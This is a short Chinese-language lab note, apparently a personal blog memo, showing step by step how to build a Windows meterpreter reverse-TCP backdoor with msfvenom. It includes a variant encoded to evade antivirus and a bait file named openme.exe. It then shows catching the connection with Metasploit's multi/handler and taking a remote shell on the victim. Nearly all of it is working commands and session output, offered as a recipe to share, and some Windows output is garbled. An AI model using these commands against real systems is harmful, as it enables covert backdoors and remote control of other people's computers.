環境
靶機 192.168.137.133 kali 192.168.137.135
步驟+
生成后門
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.137.135 LPORT=50000 -f exe -o openme.exe
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' lhost=192.168.137.135 lport=4433 -f exe > payload.exe

使用/multi/handler模塊
root@kali:~# msfconsole 
                                                  
         .                                         .
 .
      dBBBBBBb  dBBBP dBBBBBBP dBBBBBb  .                       o
       '   dB'                     BBP
    dB'dB'dB' dBBP     dBP     dBP BB
   dB'dB'dB' dBP      dBP     dBP  BB
  dB'dB'dB' dBBBBP   dBP     dBBBBBBB
                                   dBBBBBP  dBBBBBb  dBP    dBBBBP dBP dBBBBBBP
          .                  .                  dB' dBP    dB'.BP
                             |       dBP    dBBBB' dBP    dB'.BP dBP    dBP
                           --o--    dBP    dBP    dBP    dB'.BP dBP    dBP
                             |     dBBBBP dBP    dBBBBP dBBBBP dBP    dBP
                                                                    .
                .
        o                  To boldly go where no
                            shell has gone before
       =[ metasploit v4.16.30-dev                         ]
+ -- --=[ 1722 exploits - 986 auxiliary - 300 post        ]
+ -- --=[ 507 payloads - 40 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf > use exploit/multi/handler 
        設置本地ip與端口
msf exploit(multi/handler) > set lhost 192.168.137.135 lhost => 192.168.137.135 msf exploit(multi/handler) > set lport 50000 lport => 50000
啟動后門攻擊監聽
msf exploit(multi/handler) > exploit -z -j
情況+
當靶機點擊后門程序openme.exe后,kali監聽到session, 進行拿權
msf exploit(multi/handler) > [*] Sending stage (179779 bytes) to 192.168.137.139 [*] Meterpreter session 1 opened (192.168.137.135:50000 -> 192.168.137.139:49159) at 2018-04-13 22:18:04 +0800 sessions Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 meterpreter x86/windows chenglee-PC\chenglee @ CHENGLEE-PC 192.168.137.135:50000 -> 192.168.137.139:49159 (192.168.137.139) msf exploit(multi/handler) > sessions -i 1 [*] Starting interaction with 1...
控制靶機shell
meterpreter > shell Process 3028 created. Channel 1 created. Microsoft Windows [�汾 6.1.7601] ��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ���� C:\Users\chenglee\Desktop>ls

演示
kali

靶機

好東西做個分享
做個筆記。

